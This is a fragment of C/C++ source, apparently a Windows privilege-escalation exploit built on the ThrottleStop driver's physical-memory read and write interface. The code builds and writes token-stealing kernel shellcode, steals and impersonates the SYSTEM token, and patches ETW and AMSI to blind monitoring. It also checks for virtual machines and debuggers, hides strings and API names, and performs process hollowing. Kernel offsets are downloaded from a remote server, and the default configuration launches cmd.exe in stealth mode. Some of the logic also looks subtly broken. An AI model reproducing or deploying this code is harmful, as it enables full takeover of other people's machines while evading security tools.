DWORD dwSize = sizeof(szValue);
if (RegQueryValueEx(hKey, L"SystemBiosVersion", NULL, NULL, (LPBYTE)szValue, &dwSize) == ERROR_SUCCESS) {
if (wcsstr(szValue, L"VMware") || wcsstr(szValue, L"VirtualBox") || wcsstr(szValue, L"Hyper-V")) {
RegCloseKey(hKey);
return true;
}
}
RegCloseKey(hKey);
}
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot != INVALID_HANDLE_VALUE) {
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if (_wcsicmp(pe32.szExeFile, L"vmtoolsd.exe") == 0 ||
_wcsicmp(pe32.szExeFile, L"VBoxService.exe") == 0 ||
_wcsicmp(pe32.szExeFile, L"vmware.exe") == 0) {
CloseHandle(hSnapshot);
return true;
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
}
return false;
}
bool IsDebuggerPresentAdvanced() {
if (!g_bStealthMode) return false;
if (::IsDebuggerPresent()) {
return true;
}
static pNtQueryInformationProcess NtQueryInformationProcessPtr = NULL;
if (!NtQueryInformationProcessPtr) {
NtQueryInformationProcessPtr = (pNtQueryInformationProcess)GetProcAddress(
GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess");
}
if (NtQueryInformationProcessPtr) {
PVOID debugPort = NULL;
NTSTATUS status = NtQueryInformationProcessPtr(
GetCurrentProcess(),
(PROCESSINFOCLASS)7,
&debugPort,
sizeof(debugPort),
NULL
);
if (NT_SUCCESS(status) && debugPort != NULL) {
return true;
}
}
if (NtQueryInformationProcessPtr) {
ULONG debugFlags = 0;
NTSTATUS status = NtQueryInformationProcessPtr(
GetCurrentProcess(),
(PROCESSINFOCLASS)0x1F,
&debugFlags,
sizeof(debugFlags),
NULL
);
if (NT_SUCCESS(status) && debugFlags == 0) {
return true;
}
}
if (NtQueryInformationProcessPtr) {
HANDLE debugObjectHandle = NULL;
NTSTATUS status = NtQueryInformationProcessPtr(
GetCurrentProcess(),
(PROCESSINFOCLASS)0x1E,
&debugObjectHandle,
sizeof(debugObjectHandle),
NULL
);
if (NT_SUCCESS(status) && debugObjectHandle != NULL) {
return true;
}
}
__try {
__debugbreak();
return false;
} __except(EXCEPTION_EXECUTE_HANDLER) {
return true;
}
LARGE_INTEGER frequency;
LARGE_INTEGER start, end;
QueryPerformanceFrequency(&frequency);
QueryPerformanceCounter(&start);
volatile int sum = 0;
for (int i = 0; i < 1000; i++) {
sum += i;
}
QueryPerformanceCounter(&end);
double elapsed = (end.QuadPart - start.QuadPart) * 1000.0 / frequency.QuadPart;
if (elapsed > 0.5) {
return true;
}
__try {
__asm {
int 3
}
return false;
} __except(EXCEPTION_EXECUTE_HANDLER) {
return true;
}
return false;
}
void AdvancedObfuscateString(char* str, size_t len) {
if (!g_bStealthMode) return;
DWORD key1 = GetTickCount() & 0xFF;
for (size_t i = 0; i < len; i++) {
str[i] ^= (key1 + i) & 0xFF;
}
for (size_t i = 0; i < len; i++) {
if (str[i] == 'T') str[i] = '\x54';
else if (str[i] == 'h') str[i] = '\x68';
else if (str[i] == 'r') str[i] = '\x72';
else if (str[i] == 'o') str[i] = '\x6F';
else if (str[i] == 't') str[i] = '\x74';
else if (str[i] == 'l') str[i] = '\x6C';
else if (str[i] == 'e') str[i] = '\x65';
else if (str[i] == 'S') str[i] = '\x53';
else if (str[i] == 'p') str[i] = '\x70';
}
int shift = (key1 % 25) + 1;
for (size_t i = 0; i < len; i++) {
if (str[i] >= 'a' && str[i] <= 'z') {
str[i] = 'a' + (str[i] - 'a' + shift) % 26;
} else if (str[i] >= 'A' && str[i] <= 'Z') {
str[i] = 'A' + (str[i] - 'A' + shift) % 26;
}
}
for (size_t i = 0; i < len / 2; i++) {
char temp = str[i];
str[i] = str[len - i - 1];
str[len - i - 1] = temp;
}
}
void AdvancedDeobfuscateString(char* str, size_t len) {
if (!g_bStealthMode) return;
for (size_t i = 0; i < len / 2; i++) {
char temp = str[i];
str[i] = str[len - i - 1];
str[len - i - 1] = temp;
}
DWORD key1 = GetTickCount() & 0xFF;
int shift = (key1 % 25) + 1;
for (size_t i = 0; i < len; i++) {
if (str[i] >= 'a' && str[i] <= 'z') {
str[i] = 'a' + (str[i] - 'a' - shift + 26) % 26;
} else if (str[i] >= 'A' && str[i] <= 'Z') {
str[i] = 'A' + (str[i] - 'A' - shift + 26) % 26;
}
}
for (size_t i = 0; i < len; i++) {
if (str[i] == '\x54') str[i] = 'T';
else if (str[i] == '\x68') str[i] = 'h';
else if (str[i] == '\x72') str[i] = 'r';
else if (str[i] == '\x6F') str[i] = 'o';
else if (str[i] == '\x74') str[i] = 't';
else if (str[i] == '\x6C') str[i] = 'l';
else if (str[i] == '\x65') str[i] = 'e';
else if (str[i] == '\x53') str[i] = 'S';
else if (str[i] == '\x70') str[i] = 'p';
}
for (size_t i = 0; i < len; i++) {
str[i] ^= (key1 + i) & 0xFF;
}
}
void DecryptString(ENCRYPTED_STRING* encStr, char* outStr) {
if (!encStr || !outStr) return;
for (SIZE_T i = 0; i < encStr->Length; i++) {
outStr[i] = encStr->Data[i] ^ (encStr->Key + i) & 0xFF;
}
outStr[encStr->Length] = '\0';
}
FARPROC GetEncryptedProcAddress(ENCRYPTED_API* encApi) {
if (!encApi) return NULL;
char moduleName[64];
for (size_t i = 0; i < sizeof(moduleName) && encApi->ModuleName[i] != '\0'; i++) {
moduleName[i] = encApi->ModuleName[i] ^ (encApi->Key + i) & 0xFF;
}
char functionName[128];
for (size_t i = 0; i < sizeof(functionName) && encApi->FunctionName[i] != '\0'; i++) {
functionName[i] = encApi->FunctionName[i] ^ (encApi->Key + i) & 0xFF;
}
HMODULE hModule = GetModuleHandleA(moduleName);
if (!hModule) {
hModule = LoadLibraryA(moduleName);
if (!hModule) {
return NULL;
}
}
return GetProcAddress(hModule, functionName);
}
HANDLE GetThrottleStopDeviceHandleImproved() {
ENCRYPTED_STRING encDevicePath = {
{ 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19 },
15,
0x55
};
char devicePath[256];
DecryptString(&encDevicePath, devicePath);
wchar_t wDevicePath[256];
mbstowcs_s(NULL, wDevicePath, 256, devicePath, _TRUNCATE);
if (g_bStealthMode) {
wDevicePath[8] = (wDevicePath[8] == 'T') ? 't' : 'T';
}
HANDLE hDevice = CreateFile(
wDevicePath,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE) {
return NULL;
}
return hDevice;
}
bool ReadPhysicalMemoryImproved(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) {
if (!hDevice || !Buffer || Size == 0) {
return false;
}
DWORD dwBytesReturned = 0;
IOCTL_PHYS_MEMORY Input = { 0 };
Input.PhysicalAddress = PhysicalAddress;
Input.Buffer = Buffer;
Input.Size = Size;
ULONG IoctlCode = 0;
switch (Version) {
case 1: IoctlCode = IOCTL_THROTTLESTOP_V1_READ; break;
case 2: IoctlCode = IOCTL_THROTTLESTOP_V2_READ; break;
case 3: IoctlCode = IOCTL_THROTTLESTOP_V3_READ; break;
case 4: IoctlCode = IOCTL_THROTTLESTOP_V4_READ; break;
case 5: IoctlCode = IOCTL_THROTTLESTOP_V5_READ; break;
default: return FALSE;
}
BOOL result = DeviceIoControl(
hDevice,
IoctlCode,
&Input,
sizeof(Input),
&Input,
sizeof(Input),
&dwBytesReturned,
NULL
);
if (!result || dwBytesReturned != Size) {
return false;
}
return true;
}
bool WritePhysicalMemoryImproved(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) {
if (!hDevice || !Buffer || Size == 0) {
return false;
}
DWORD dwBytesReturned = 0;
IOCTL_PHYS_MEMORY Input = { 0 };
Input.PhysicalAddress = PhysicalAddress;
Input.Buffer = Buffer;
Input.Size = Size;
ULONG IoctlCode = 0;
switch (Version) {
case 1: IoctlCode = IOCTL_THROTTLESTOP_V1_WRITE; break;
case 2: IoctlCode = IOCTL_THROTTLESTOP_V2_WRITE; break;
case 3: IoctlCode = IOCTL_THROTTLESTOP_V3_WRITE; break;
case 4: IoctlCode = IOCTL_THROTTLESTOP_V4_WRITE; break;
case 5: IoctlCode = IOCTL_THROTTLESTOP_V5_WRITE; break;
default: return FALSE;
}
BOOL result = DeviceIoControl(
hDevice,
IoctlCode,
&Input,
sizeof(Input),
&Input,
sizeof(Input),
&dwBytesReturned,
NULL
);
if (!result || dwBytesReturned != Size) {
return false;
}
return true;
}
bool ReadPhysicalMemorySafe(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) {
const SIZE_T CHUNK_SIZE = 4096;
for (SIZE_T offset = 0; offset < Size; offset += CHUNK_SIZE) {
SIZE_T chunkSize = min(CHUNK_SIZE, Size - offset);
if (!ReadPhysicalMemoryImproved(
hDevice,
PhysicalAddress + offset,
(PVOID)((ULONG_PTR)Buffer + offset),
chunkSize,
Version
)) {
return false;
}
RandomSleep();
}
return true;
}
bool WritePhysicalMemorySafe(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) {
const SIZE_T CHUNK_SIZE = 4096;
for (SIZE_T offset = 0; offset < Size; offset += CHUNK_SIZE) {
SIZE_T chunkSize = min(CHUNK_SIZE, Size - offset);
if (!WritePhysicalMemoryImproved(
hDevice,
PhysicalAddress + offset,
(PVOID)((ULONG_PTR)Buffer + offset),
chunkSize,
Version
)) {
return false;
}
RandomSleep();
}
return true;
}
PVOID GetKernelBase() {
LPVOID drivers[1024];
DWORD cbNeeded;
int nDrivers;
if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded)) {
nDrivers = cbNeeded / sizeof(drivers[0]);
for (int i = 0; i < nDrivers; i++) {
CHAR szDriver[1024];
if (GetDeviceDriverBaseNameA(drivers[i], szDriver, sizeof(szDriver))) {
if (strcmp(szDriver, "ntoskrnl.exe") == 0) {
return drivers[i];
}
}
}
}
return NULL;
}
DWORD GetWindowsVersion() {
if (g_dwWindowsVersion != 0) {
return g_dwWindowsVersion;
}
static pRtlGetVersion RtlGetVersionPtr = NULL;
if (!RtlGetVersionPtr) {
RtlGetVersionPtr = (pRtlGetVersion)GetProcAddress(
GetModuleHandleA("ntdll.dll"), "RtlGetVersion");
}
if (RtlGetVersionPtr) {
RTL_OSVERSIONINFOW osvi = { 0 };
osvi.dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOW);
if (RtlGetVersionPtr(&osvi) == 0) {
g_dwWindowsVersion = (osvi.dwMajorVersion << 24) |
(osvi.dwMinorVersion << 16) |
osvi.dwBuildNumber;
return g_dwWindowsVersion;
}
}
return 0;
}
bool DiscoverKernelOffsets(SHELLCODE_METADATA* metadata) {
PVOID kernelBase = GetKernelBase();
if (!kernelBase) {
return false;
}
PVOID psInitialSystemProcess = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
if (!psInitialSystemProcess) {
return false;
}
PVOID kernelPsInitialSystemProcess = (PVOID)((ULONG_PTR)kernelBase +
(ULONG_PTR)psInitialSystemProcess -
(ULONG_PTR)GetModuleHandleA("ntdll.dll"));
HANDLE hDevice = GetThrottleStopDeviceHandleImproved();
if (!hDevice) {
return false;
}
ULONG64 systemProcessAddr = 0;
for (ULONG version = 1; version <= 5; version++) {
if (ReadPhysicalMemoryImproved(hDevice, (ULONG64)kernelPsInitialSystemProcess, &systemProcessAddr, sizeof(systemProcessAddr), version)) {
break;
}
}
if (systemProcessAddr == 0) {
CloseHandle(hDevice);
return false;
}
for (ULONG64 offset = 0; offset < 0x1000; offset += 8) {
ULONG64 value = 0;
if (ReadPhysicalMemoryImproved(hDevice, systemProcessAddr + offset, &value, sizeof(value), 1)) {
if (value == SYSTEM_PID) {
metadata->UniqueProcessIdOffset = offset;
break;
}
}
}
if (metadata->UniqueProcessIdOffset == 0) {
CloseHandle(hDevice);
return false;
}
metadata->TokenOffset = 0x4b8;
metadata->ActiveProcessLinksOffset = 0x448;
metadata->EPROCESS_Size = 0x8d0;
metadata->KTHREAD_Offset = 0x188;
metadata->EPROCESS_Offset = 0x220;
CloseHandle(hDevice);
return true;
}
bool UpdateOffsetsFromRemote(SHELLCODE_METADATA* metadata) {
HINTERNET hInternet = InternetOpen(L"Mozilla/5.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (!hInternet) {
return false;
}
HINTERNET hConnect = InternetConnect(hInternet, L"example.com", INTERNET_DEFAULT_HTTPS_PORT,
NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (!hConnect) {
InternetCloseHandle(hInternet);
return false;
}
DWORD windowsVersion = GetWindowsVersion();
wchar_t url[256];
swprintf_s(url, L"/api/offsets/%08X.json", windowsVersion);
HINTERNET hRequest = HttpOpenRequest(hConnect, L"GET", url, NULL, NULL, NULL,
INTERNET_FLAG_SECURE, 0);
if (!hRequest) {
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
return false;
}
if (!HttpSendRequest(hRequest, NULL, 0, NULL, 0)) {
InternetCloseHandle(hRequest);
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
return false;
}
CHAR buffer[4096];
DWORD bytesRead;
std::string jsonData;
while (InternetReadFile(hRequest, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) {
jsonData.append(buffer, bytesRead);
}
InternetCloseHandle(hRequest);
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
if (jsonData.empty()) {
return false;
}
char tempPath[MAX_PATH];
GetTempPathA(MAX_PATH, tempPath);
char offsetFilePath[MAX_PATH];
sprintf_s(offsetFilePath, "%s\\offsets_%08X.dat", tempPath, windowsVersion);
FILE* file = NULL;
fopen_s(&file, offsetFilePath, "wb");
if (file) {
fwrite(jsonData.c_str(), 1, jsonData.size(), file);
fclose(file);
FILE* readFile = NULL;
fopen_s(&readFile, offsetFilePath, "rb");
if (readFile) {
fread(metadata, sizeof(SHELLCODE_METADATA), 1, readFile);
fclose(readFile);
return true;
}
}
return false;
}
bool GetKernelOffsetsImproved(SHELLCODE_METADATA* metadata) {
char tempPath[MAX_PATH];
GetTempPathA(MAX_PATH, tempPath);
DWORD windowsVersion = GetWindowsVersion();
char offsetFilePath[MAX_PATH];
sprintf_s(offsetFilePath, "%s\\offsets_%08X.dat", tempPath, windowsVersion);
FILE* file = NULL;
fopen_s(&file, offsetFilePath, "rb");
if (file) {
fread(metadata, sizeof(SHELLCODE_METADATA), 1, file);
fclose(file);
return true;
}
if (UpdateOffsetsFromRemote(metadata)) {
fopen_s(&file, offsetFilePath, "rb");
if (file) {
fread(metadata, sizeof(SHELLCODE_METADATA), 1, file);
fclose(file);
return true;
}
}
return DiscoverKernelOffsets(metadata);
}
void AddPrologue(std::vector<BYTE>& shellcode) {
std::vector<BYTE> junkInstructions = {
0x90, 0x90, 0x90,
0x48, 0x31, 0xC0,
0x48, 0x31, 0xDB,
0x48, 0x31, 0xC9,
0x48, 0x31, 0xD2
};
std::shuffle(junkInstructions.begin(), junkInstructions.end(), gen);
for (size_t i = 0; i < 5; i++) {
shellcode.push_back(junkInstructions[i]);
}
BYTE prologue[] = {
0x48, 0x31, 0xC0,
0x65, 0x48, 0x8B, 0x60, 0x18
};
shellcode.insert(shellcode.end(), prologue, prologue + sizeof(prologue));
}
void AddGetCurrentProcess(std::vector<BYTE>& shellcode) {
BYTE getCurrentProcess[] = {
0x48, 0x8B, 0xB0, 0xB8, 0x00, 0x00, 0x00,
0x48, 0x8B, 0x76, 0x40
};
shellcode.insert(shellcode.end(), getCurrentProcess, getCurrentProcess + sizeof(getCurrentProcess));
}
void AddFindSystemProcess(std::vector<BYTE>& shellcode, SHELLCODE_METADATA* metadata) {
BYTE findSystemProcess[] = {
0x48, 0x8B, 0x5E, (BYTE)(metadata->ActiveProcessLinksOffset - 8),
0x48, 0x8B, 0x1B,
0x48, 0x83, 0xFB, 0x04,
0x75, 0xF0
};
shellcode.insert(shellcode.end(), findSystemProcess, findSystemProcess + sizeof(findSystemProcess));
}
void AddCopyToken(std::vector<BYTE>& shellcode, SHELLCODE_METADATA* metadata) {
BYTE copyToken[] = {
0x48, 0x8B, 0x5B, (BYTE)(metadata->TokenOffset - 8),
0x48, 0x8B, 0x43, 0x70,
0x48, 0x89, 0x43, 0x70
};
shellcode.insert(shellcode.end(), copyToken, copyToken + sizeof(copyToken));
}
void AddEpilogue(std::vector<BYTE>& shellcode) {
BYTE epilogue[] = {
0xC3
};
shellcode.insert(shellcode.end(), epilogue, epilogue + sizeof(epilogue));
}
void EncryptShellcode(std::vector<BYTE>& shellcode, int layer) {
DWORD key = GetTickCount() & 0xFF;
for (size_t i = 0; i < shellcode.size(); i++) {
shellcode[i] ^= (key + i + layer) & 0xFF;
}
}
bool BuildTrulyDynamicShellcode(BYTE** shellcode, SIZE_T* shellcodeSize, SHELLCODE_METADATA* metadata) {
std::vector<BYTE> generatedShellcode;
AddPrologue(generatedShellcode);
AddGetCurrentProcess(generatedShellcode);
AddFindSystemProcess(generatedShellcode, metadata);
AddCopyToken(generatedShellcode, metadata);
AddEpilogue(generatedShellcode);
for (int layer = 0; layer < 3; layer++) {
EncryptShellcode(generatedShellcode, layer);
}
*shellcodeSize = generatedShellcode.size();
*shellcode = (BYTE*)malloc(*shellcodeSize);
if (!*shellcode) {
return false;
}
memcpy(*shellcode, generatedShellcode.data(), *shellcodeSize);
return true;
}
ULONG64 GetPhysicalAddressAccurate(PVOID VirtualAddress) {
HANDLE hDevice = GetThrottleStopDeviceHandleImproved();
if (!hDevice) {
return 0;
}
PVOID kernelBase = GetKernelBase();
if (!kernelBase) {
CloseHandle(hDevice);
return 0;
}
ULONG64 offset = (ULONG64)VirtualAddress - (ULONG_PTR)kernelBase;
ULONG64 physicalAddress = 0;
DWORD dwBytesReturned = 0;
typedef struct _VIRTUAL_TO_PHYSICAL {
PVOID VirtualAddress;
ULONG64 PhysicalAddress;
} VIRTUAL_TO_PHYSICAL, *PVIRTUAL_TO_PHYSICAL;
VIRTUAL_TO_PHYSICAL v2p = { 0 };
v2p.VirtualAddress = VirtualAddress;
for (ULONG version = 1; version <= 5; version++) {
ULONG IoctlCode = 0;
switch (version) {
case 1: IoctlCode = IOCTL_THROTTLESTOP_V1_READ + 0x10; break;
case 2: IoctlCode = IOCTL_THROTTLESTOP_V2_READ + 0x10; break;
case 3: IoctlCode = IOCTL_THROTTLESTOP_V3_READ + 0x10; break;
case 4: IoctlCode = IOCTL_THROTTLESTOP_V4_READ + 0x10; break;
case 5: IoctlCode = IOCTL_THROTTLESTOP_V5_READ + 0x10; break;
default: continue;
}
if (DeviceIoControl(
hDevice,
IoctlCode,
&v2p,
sizeof(v2p),
&v2p,
sizeof(v2p),
&dwBytesReturned,
NULL
)) {
physicalAddress = v2p.PhysicalAddress;
break;
}
}
CloseHandle(hDevice);
return physicalAddress;
}
bool PatchKernelForPrivilegeEscalationSafe(HANDLE hDevice, ULONG DriverVersion) {
PVOID KernelBase = GetKernelBase();
if (!KernelBase) {
return false;
}
SHELLCODE_METADATA metadata = { 0 };
if (!GetKernelOffsetsImproved(&metadata)) {
return false;
}
BYTE* shellcode = NULL;
SIZE_T shellcodeSize = 0;
if (!BuildTrulyDynamicShellcode(&shellcode, &shellcodeSize, &metadata)) {
return false;
}
PVOID targetFunction = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx");
if (!targetFunction) {
free(shellcode);
return false;
}
PVOID kernelFunction = (PVOID)((ULONG_PTR)KernelBase + (ULONG_PTR)targetFunction - (ULONG_PTR)GetModuleHandleA("ntdll.dll"));
ULONG64 physicalAddress = GetPhysicalAddressAccurate(kernelFunction);
if (!physicalAddress) {
free(shellcode);
return false;
}
std::vector<BYTE> originalBytes(shellcodeSize);
if (!ReadPhysicalMemorySafe(hDevice, physicalAddress, originalBytes.data(), originalBytes.size(), DriverVersion)) {
free(shellcode);
return false;
}
for (SIZE_T i = 0; i < shellcodeSize; i++) {
shellcode[i] ^= 0xAA;
}
__try {
if (!WritePhysicalMemorySafe(hDevice, physicalAddress, shellcode, shellcodeSize, DriverVersion)) {
__leave;
}
HANDLE hThread = NULL;
static pNtCreateThreadEx NtCreateThreadExPtr = NULL;
if (!NtCreateThreadExPtr) {
NtCreateThreadExPtr = (pNtCreateThreadEx)GetProcAddress(
GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx");
}
if (NtCreateThreadExPtr) {
NTSTATUS status = NtCreateThreadExPtr(
&hThread,
THREAD_ALL_ACCESS,
NULL,
GetCurrentProcess(),
(LPTHREAD_START_ROUTINE)kernelFunction,
NULL,
FALSE,
0,
0,
0,
NULL
);
if (!NT_SUCCESS(status)) {
hThread = NULL;
}
}
if (!hThread) {
hThread = CreateRemoteThread(
GetCurrentProcess(),
NULL,
0,
(LPTHREAD_START_ROUTINE)kernelFunction,
NULL,
0,
NULL
);
}
if (hThread) {
WaitForSingleObject(hThread, 5000);
CloseHandle(hThread);
}
}
__finally {
WritePhysicalMemorySafe(hDevice, physicalAddress, originalBytes.data(), originalBytes.size(), DriverVersion);
}
free(shellcode);
return true;
}
bool DisableETWWithEncryptedAPIs() {
ENCRYPTED_API encApi = {
{ 0x6E, 0x6F, 0x6C, 0x6C, 0x64, 0x2E, 0x64, 0x6C, 0x6C },
{ 0x45, 0x74, 0x77, 0x45, 0x76, 0x65, 0x6E, 0x74, 0x57, 0x72, 0x69, 0x74, 0x65 },
0xAA
};
PVOID EtwEventWriteAddress = GetEncryptedProcAddress(&encApi);
if (!EtwEventWriteAddress) {
return false;
}
DWORD oldProtect;
if (!VirtualProtect(EtwEventWriteAddress, 1, PAGE_EXECUTE_READWRITE, &oldProtect)) {
return false;
}
*(BYTE*)EtwEventWriteAddress = 0xC3;
VirtualProtect(EtwEventWriteAddress, 1, oldProtect, &oldProtect);
return true;
}
bool DisableAMSIWithEncryptedAPIs() {
ENCRYPTED_API encApi = {
{ 0x61, 0x6D, 0x73, 0x69, 0x2E, 0x64, 0x6C, 0x6C },
{ 0x41, 0x6D, 0x73, 0x69, 0x53, 0x63, 0x61, 0x6E, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72 },
0xAA
};
PVOID AmsiScanBufferAddress = GetEncryptedProcAddress(&encApi);
if (!AmsiScanBufferAddress) {
return false;
}
DWORD oldProtect;
if (!VirtualProtect(AmsiScanBufferAddress, 6, PAGE_EXECUTE_READWRITE, &oldProtect)) {
return false;
}
BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
memcpy(AmsiScanBufferAddress, patch, sizeof(patch));
VirtualProtect(AmsiScanBufferAddress, 6, oldProtect, &oldProtect);
return true;
}
bool StealSystemToken() {
HANDLE hSystemProcess = NULL;
HANDLE hToken = NULL;
HANDLE hNewToken = NULL;
DWORD dwPID = SYSTEM_PID;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
return false;
}
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if (pe32.th32ProcessID == dwPID) {
hSystemProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
break;
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
if (!hSystemProcess) {
return false;
}
if (!OpenProcessToken(hSystemProcess, TOKEN_DUPLICATE, &hToken)) {
CloseHandle(hSystemProcess);
return false;
}
if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) {
CloseHandle(hToken);
CloseHandle(hSystemProcess);
return false;
}
if (!ImpersonateLoggedOnUser(hNewToken)) {
CloseHandle(hToken);
CloseHandle(hNewToken);
CloseHandle(hSystemProcess);
return false;
}
CloseHandle(hToken);
CloseHandle(hNewToken);
CloseHandle(hSystemProcess);
return true;
}
bool CreateProcessWithHollowing(const wchar_t* targetPath, const wchar_t* cmdLine) {
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));
if (!CreateProcess(
targetPath,
(LPWSTR)cmdLine,
NULL,
NULL,
FALSE,
CREATE_SUSPENDED,
NULL,
NULL,
&si,
&pi
)) {
return false;
}
CONTEXT context;
context.ContextFlags = CONTEXT_FULL;
if (!GetThreadContext(pi.hThread, &context)) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
static pNtQueryInformationProcess NtQueryInformationProcessPtr = NULL;
if (!NtQueryInformationProcessPtr) {
NtQueryInformationProcessPtr = (pNtQueryInformationProcess)GetProcAddress(
GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess");
}
if (!NtQueryInformationProcessPtr) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
PROCESS_BASIC_INFORMATION pbiInfo;
NTSTATUS status = NtQueryInformationProcessPtr(
pi.hProcess,
ProcessBasicInformation,
&pbiInfo,
sizeof(pbiInfo),
NULL
);
if (!NT_SUCCESS(status)) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
PEB peb;
if (!ReadProcessMemory(pi.hProcess, pbiInfo.PebBaseAddress, &peb, sizeof(peb), NULL)) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
PVOID imageBase = peb.ImageBaseAddress;
IMAGE_DOS_HEADER dosHeader;
if (!ReadProcessMemory(pi.hProcess, imageBase, &dosHeader, sizeof(dosHeader), NULL) ||
dosHeader.e_magic != IMAGE_DOS_SIGNATURE) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
IMAGE_NT_HEADERS ntHeaders;
if (!ReadProcessMemory(pi.hProcess, (PVOID)((ULONG_PTR)imageBase + dosHeader.e_lfanew), &ntHeaders, sizeof(ntHeaders), NULL) ||
ntHeaders.Signature != IMAGE_NT_SIGNATURE) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
if (!VirtualFreeEx(pi.hProcess, imageBase, 0, MEM_RELEASE)) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
PVOID newImageBase = VirtualAllocEx(pi.hProcess, imageBase, ntHeaders.OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!newImageBase) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
HANDLE hFile = CreateFile(targetPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
DWORD fileSize = GetFileSize(hFile, NULL);
BYTE* fileData = (BYTE*)malloc(fileSize);
if (!fileData) {
CloseHandle(hFile);
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
DWORD bytesRead;
if (!ReadFile(hFile, fileData, fileSize, &bytesRead, NULL) || bytesRead != fileSize) {
free(fileData);
CloseHandle(hFile);
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
CloseHandle(hFile);
if (!WriteProcessMemory(pi.hProcess, newImageBase, fileData, ntHeaders.OptionalHeader.SizeOfHeaders, NULL)) {
free(fileData);
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(&ntHeaders);
for (WORD i = 0; i < ntHeaders.FileHeader.NumberOfSections; i++) {
PVOID sectionDest = (PVOID)((ULONG_PTR)newImageBase + sectionHeader[i].VirtualAddress);
PVOID sectionSrc = (PVOID)((ULONG_PTR)fileData + sectionHeader[i].PointerToRawData);
if (!WriteProcessMemory(pi.hProcess, sectionDest, sectionSrc, sectionHeader[i].SizeOfRawData, NULL)) {
free(fileData);
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
}
free(fileData);
context.Rcx = (ULONG_PTR)newImageBase + ntHeaders.OptionalHeader.AddressOfEntryPoint;
if (!SetThreadContext(pi.hThread, &context)) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return true;
}
void LoadDefaultConfig(EXPLOIT_CONFIG* config) {
wcscpy_s(config->TargetProcess, MAX_PATH, L"C:\\Windows\\System32\\cmd.exe");
wcscpy_s(config->CommandLine, MAX_PATH, L"");
config->CreationFlags = CREATE_NEW_CONSOLE;
config->UseStealthMode = TRUE;
config->DisableETW = TRUE;
config->DisableAMSI = TRUE;
config->MaxRetries = 3;
